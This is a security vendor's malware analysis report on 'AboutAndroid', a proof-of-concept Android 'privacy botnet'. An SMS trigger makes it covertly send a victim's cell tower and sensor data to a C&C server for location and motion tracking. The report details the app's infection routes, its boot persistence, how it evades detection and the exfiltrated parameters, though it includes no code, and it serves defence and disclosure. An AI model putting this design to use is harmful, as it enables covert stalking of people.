Meet the Potnet

Next generation Privacy botnet

AboutAndroid | Malware Analysis Report

Eran Goldstein

Senior Cyber Security & Malware Researcher at ZIMPERIUM

GENERAL NOTES: THE FOLLOWING INFORMATION SUMMERAIZE “POTNETS AND NEXT

GENERATION BOTNET TECHNIQUES” RESEARCH PROCESS AND CONTAINS

SENSITIVE INFORMATION. THIS PAPER ANALYZES IN DETAILS THE

“ABOUTANDROID” ANDROID MALWARE AND BRINGS EVIDENCE THAT

MOBILE DEVICES WILL GET MORE AND MORE INFECTED IN A NEAR FUTURE,

LEVERAGING SYSTEMS ALREADY USED ON THE FIXED SIDE.

WARNING: ABOUTANDROID IS A THREAT FOR BOTH USERS AND ORGANIZATIONS AS IT

EXPOSING CLIENT INTO A PRIVACY ISSUES. ALL THE TOOLS AND

APPLICATIONS THAT WILL BE DEMONSTRATE IN THIS DOCUMENT

DEVELOPED FOR RESEARCH PURPOSES ONLY, IT IS STRONGLY

RECOMMENDED THAT YOU DO NOT USE THIS TOOL FOR ILLEGAL

PURPOSES. ALL RIGHTS OF THE KEYWORDS “POTNET” AND “POTNETS” AND

THEIR DEFINITION ARE REGISTERED AND RESERVED TO THE AUTHOR OF

THIS MANUAL.

CLARIFICATION: WE WILL NOT BE RESPONSIBLE FOR ANY DAMAGE THAT CAUSED BY USING

THE TOOLS, APPLICATION OR TECHNIQUES THAT DEMONSTRATED.

Table of Contents

Contents Introduction ............................................................................................................................................................ 4

The next generation of privacy botnet ................................................................................................................... 5

Suspicious Activity .................................................................................................................................................. 6

Analysis ................................................................................................................................................................... 7

Malware Sample ............................................................................................................................................. 8

Infection .......................................................................................................................................................... 9

Operation ...................................................................................................................................................... 10

Command and Control (C&C) ....................................................................................................................... 11

Network Impact ............................................................................................................................................ 12

Proof-of-Concept .................................................................................................................................................. 13

Conclusions ........................................................................................................................................................... 16

Introduction

Cyber Security researchers discovered a new techniques and methodology of privacy botnet that allows an attacker to gain user’s personal information, detailed location, movement and motion surveillance, area mapping and more.

The malware found was designed to work in a stealth mode and running as a receiver behind a system background service. Once the attacker sends an SMS message containing different message body texts (For example: question mark or smiley) to the target device, it will cause the device to send a private information that not required any special permission or dialog's box approval from the victim client.

The core functionality and the real advantage of the potnet (or privacy botnet), from an attacker's point of view, is the ability to get different type of data from the victim's device including: cellular network information and other sensor data of the targeted victim.

The malware allows an attacker to get an information about the geolocation and the positioning of the target device. This data is calculated on the potnet C&C server and then available to the attacker in order to track the target device's exact motions.

Diagram 1.0: Human tracking system

Next generation of privacy botnet

Potnet and The Next generation of privacy's botnets are not acting as a banking Trojan or malware and it is not designed to steal your banking credentials, log into your account or transfer your funds to criminals, is the type of malware that’s designed to track your motion, movement and geolocation, so that they can be used for social engineering, advanced positioning and tracking techniques. The Potnet's malware that found essentially doing this by grabbing the victim’s information and send it to certain websites. These websites are pre-specified by the attackers, and they are typically Command and Control (C&C) servers that hosted anonymously in a third-party web hosting service. The data that is collected, then calculated on the server side in order to provide to the attacker an accurate picture about the victim. Utilizing a short processing time on the client side of the malware, data sent to the server minimized, thus reducing the possibility of detection by client side’s defense mechanisms. Using a non-conventional device data allow the attacker to track victims that located at low-connectivity or bad-signal environments like inside buildings and even underground level (according to the cellular data signal).

Diagram 1.1: Tracking victims in low-connectivity or bad-signal environments

Suspicious Activity

In the next example we are going to explain the suspicious activities of a potnet's malware by code implementation and demonstration of the AboutAndroid.apk malware. The AboutAndroid malware takes the advantage of perfectly legitimate data that can be read without the need for any special permission or dialog approval from the client side, what makes the detection process of potnet's malware to quite difficult. The AboutAndroid malware that analyzed suspicious to the following symptoms and running activities:

1. Ability to obtain a private data from the system without any prior information and without the user’s approval.

2. Ability to obtain a private data from the system without any prior information and without

any special permission.

3. Responsible for high energy consumption of the battery. One of the harmful aspects of the potnet's malware family is that when it enters into the target mobile device, it is very difficult to be detected or to know the exact trigger that used in order to send an information or data out from the device.

Diagram 1.2: The Cell tower (cellid), Cellphone and the signal

Analysis

AboutAndroid malware, logs the user’s sensors and cellular network data.

Once executed, the malware generates an incoming broadcast receiver and then waits for a specific

SMS text message that contains smiley or question mark as the message text body for example. Once

the SMS message arrived, the malware then logs all activities related to a specific sensor data and

the cellular network information include the cell id, LAC, MNC, MCC, etc.… and sending them to the

potnet C&C server.

Sending only a small amount of data to the C&C server at the backend reduces the possibility of

detection by client side’s defense mechanisms (like Anti-Viruses or other signature-based protection

techniques). This methodology and technique of calculating additional information that related to

the victim by correlating the collected data with third-party APIs and other web-services are one of

the advantages of potnets and the next generation botnets.

Despite of the fact that this kind of attack must use a strong social engineering lure in order to

convince the user to click on a malicious link or hope that the user will be tricked into installing an

app. Once this is done, the AboutAndroid malware will stay persistent on the victim device and can

be triggered via SMS message.

Diagram 1.3: Triangulation is calculated according to the signal of every base-station (cell tower)

Malware Sample

The diagram below shows the report of an AboutAndroid malware sample that scanned using the VirusTotal service by 56 different antivirus engines and found as clean.

In an attempt to looks as not malicious software the AboutAndroid malware is using the namespace of “com.google.aboutandroid”.

Diagram 1.4: VirusTotal scan report

Infection

Infection of AboutAndroid can be done in different ways. For example, phishing spam can be used to lure the victim to an infected web site, where an embedded <iframe> causes the browser to automatically download a file called AboutAndroid.apk (or any other file). The user must then install it by clicking on the downloaded file and follow the manual installation process.

Other techniques can be implemented by using mobile application markets, 3rd party websites or Trojan-Downloaders.

Trojan-Downloaders are often distributed as part of the payload of another malware, such as a Trojan-Dropper. Trojan-Downloaders may also be distributed as a file attachment to spam e-mails, you get an e-mail that seems to come from a high-profile company with an attached invoice (for example) in the form of a .doc or a .pdf document. The invoice looks innocuous enough, but here's the catch: It can run a PDF reader exploits or macros in Microsoft Word in order to install the malware.

Once installed, there is no application icon on the screen or any user interface to interact with.

This is because our malware has installed itself as a background service that only start when the screen is unlocked by the user or when the device is re-booted.

The malware service listens for the ON_BOOT or USER_PRESENT intents.

The only evidence that the malware is installed is through the “Manage Applications” section of “Settings”. This will show that an application called “com.google.aboutandroid” is running.

You can get rid of the infection by uninstalling the application.

Diagram 2.0: Installation of AboutAndroid Malware POC

Operation

When the malware’s service starts, it registers a broadcast receiver in the background service and a SensorEventListener.

Diagram 2.1: The malware register a sensor event listener

Once SMS message that contains ":-)" as body text arrived to the device, the app logs the infected device’s sensor values and cellular network's information and then opens up a TCP connection to the primary potnet C&C server.

Diagram 2.2: check if the SMS message contains ":-)" as body text

Command and Control (C&C)

Despite of the fact that a fairly simple command and control protocol is used to send data over an

HTTP connection.

The potnet C&C Server compensates and predominantly used to access different API and web services in order to calculate additional information about the physical environment of the victim device and perform a triangulation of the cellid and neighbors network information.

Diagram 2.3: The C&C server’s IP address

In addition, In order to translate the victim device data into an accurate motion tracking’s valuable information, the C&C server is performing a geometric calculation that correlated with the sensor data that collected.

Diagram 2.4: Assign the parameter values and prepare the http request to the C&C server

The sensors' data that's collected contains data from more than 7 different sensors includes Barometer Sensor, Proximity Sensor, Linear Acceleration Sensor, Gyroscope Sensor, Temperature Sensor, Gravity Sensor, Light Sensor and more.

Network Impact

In the diagram below we can see the HTTP request that arrives from the victim device and intercepted in our burp proxy. We can observe the different parameters that the app sending, For example:

client = the client mobile device phone number.

cid = the cell id that the mobile device connected to.

lac = Local Area Code of the cellular network provider.

mnc = Network Code of the cellular base station antenna provider.

mcc = Country Code of the cellular base station antenna.

signal = the signal of the mobile device from the cellular base station antenna (in dBm).

cell_lon = the longitude of the cellular base station antenna (Before triangulation).

cell_lat = the latitude of the cellular base station antenna (Before triangulation).

Diagram 2.5: Intercepting the request from the victim device to the C&C server

Proof-of-Concept

After we launched one of the malware’s hidden intent (activity - not the main one) we can see how it looks at the diagram below. AboutAndroid Malware POC installed on the victim device and we are ready to begin with our simple scenario.

Diagram 3.0: AboutAndroid Malware POC – an activity intent launched (not in hidden mode)

1. In order to track the victim, the attacker sends an SMS message with the text of “” to the victim device.

Diagram 3.1: The attacker is sending the SMS message

2. The victim gets the SMS message

Diagram 3.2: No suspicious activities on the victim device Diagram 3.3: The victim device getting the SMS message

3. The attacker is able now to browse to the AboutAndroid potnet C&C server GUI console and to get

all the relevant and valuable information about the victim.

Diagram 3.4 AboutAndroid potnet C&C server – part 1: basic information, indicators and the Motion Detection module

We can’t observe any

suspicious activity on

the victim device

In diagram 3.4 we can see that the basic information about our victim includes: Cellular network information, Radio signal related data, the calculation of the device location, “Inside building” indicator, Floor level indicator, etc.…

In addition, we can see the Motion Detection module (at the right bottom corner). The Motion Detection module still showing us every exact motion of the victim device, triggered by any new movement of our human target.

TIP: It is recommended to search on the internet for the full scenario's movie clip of this proof of concept demonstration in order to see the full features list of this AboutAndroid malware.

In diagram 3.5 we can see the calculated data of the victim include triangulation data, base-station measurements and the estimated location of the victim device.

Diagram 3.5 AboutAndroid potnet C&C server – part 2: calculated data of the victim

Conclusions

It seems that running a standard antivirus sweep will not get rid of AboutAndroid or other potnet’s malwares and since the program doesn't really make its presence known, you may be in trouble if you find that you're already infected with it.

If you think you may have become infected by potnet malware, YOU should uninstall any suspicious app that you are not familiar with, otherwise wipe your device and perform a “Factory reset”.

In my opinion, potnet malware trying to get an advantage of a victim device by implementation of an incoming broadcast receiver, sensors listeners and other non-conventional techniques’ data, what allows the malware to run in a quite stealth mode as well to get an information from the victim device without any user's interruption or the need for dialog's approval from the client’s side.

The AboutAndroid malware runs in the background as a service and its operation is not noticeable to the user. However, it will likely consume considerable battery power when active, which will raise suspicions. On the other hand, users with a capped data plan will not notice to almost any charges changes on their bill.

Once a specific app has been detected and signed, most mobile anti-virus products will be able to detect and remove the threat by uninstalling the malicious app.

Notes for Android Developers and Google Security Team

Giving applications direct access to hardware is dangerous. It is better if permissions will need to

address sensor access. In addition, hardware should not provide more than what applications require

and provide only an abstractions, not raw data.

http://www.zimperium.com

www.zimperium.com, ZIMPERIUM and Zimperium logo are trademarks of ZIMPERIUM Inc. All other trademarks are the property of their respective owners. The information presented is subject to change without notice. ZIMPERIUM assumes no responsibility for inaccuracies contained herein.

Copyright © 2015 ZIMPERIUM Inc. All rights reserved.